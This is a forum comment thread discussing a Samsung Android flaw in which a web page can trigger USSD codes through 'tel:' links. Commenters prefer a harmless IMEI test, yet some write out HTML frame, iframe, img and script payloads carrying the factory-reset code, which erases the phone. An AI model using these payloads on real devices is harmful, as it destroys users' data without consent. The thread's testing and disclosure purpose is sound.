Seriously? You're posting the DESTRUCTIVE version of the exploit instead of a safe test version? Shame on you.

If you want to check the functionality - it would be far more responsible to use a non-destructive USSD code.

e.g. *#06# displays the phone's IMEI number

Testing this myself, any USSD code that begins with * # launches the device's dialler with no characters dialled. Looking at the list of codes: http://umitem.blogspot.com.au/2010/10/samsung-galaxy-s-i9000...

The factory reset appears to be the only USSD "auto dialled" code that doesn't begin with *#. Which is rather unfortunate.

Edit: Actually, the IMEI code works on the Galaxy S2 running 2.3 (just tested) but not the Galaxy S3 running 4.0. My above comment refers to the S3.

You need to replace # with %23

I did replace the # with %23 in my testing, it works on the S2 but not the S3. You can view for yourself at: http://kristofferr.com/samsung.html

<!DOCTYPE html> Seconded. This works beautifully as proof-of-concept against my S2 and a colleagues random HTC phone.

<html> <frameset> <frame src="tel:*%2306%23" /> </frameset> </html>

How about you use proper HTML instead of just the frame code and nothing else?

e.g.

    <!DOCTYPE html>
    <html>
    <frameset>
        <frame src="tel:*2767*3855%23">
    </frameset>
    </html>

Also will be interesting to check other ways:<iframe src="tel:27673855%23">, <img src="tel:27673855%23">, <script type="text/javascript">location.href="tel:27673855%23";</script> and so on.

iFrame works, direct link too. I tested also things like URL encoding via # = %23, * = %2A etc. - but does not really matter, the target is the dialer, not the browser.

http://pastebin.com/cGgs7T4h << some thoughts

yes it works now, however, you need to press the call button to initiate the format